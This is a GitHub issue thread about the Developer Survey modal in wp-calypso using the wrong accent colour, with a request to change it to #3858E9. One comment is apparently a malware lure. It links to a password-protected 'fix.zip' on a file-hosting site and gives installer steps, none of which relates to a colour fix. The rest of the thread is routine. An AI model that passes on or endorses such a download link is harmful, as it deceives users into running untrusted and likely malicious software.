### ISSUE TITLE
The Developer Survey modal has the wrong colors

### ISSUE THREAD

**Issue by taipeicoder** [Automattic/wp-calypso#94014]
## Description
See context: pbxlJb-6dR-p2, 09:55.

Currently, the accent color of the Developer Survey doesn't match the accent color of the UI.
![Image](https://github.com/user-attachments/assets/a9e7f96b-adb8-465f-ac03-df6fc81c2b47)

The color for the following areas should be updated to `#3858E9`.
Note that the image is SVG so that could be updated as well.
![Image](https://github.com/user-attachments/assets/141dfdba-aad7-40f0-908c-ba4784589d01)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ianstewart** [comment]
@oskosk a quick fix here if someone focused on developer experience could grab it.
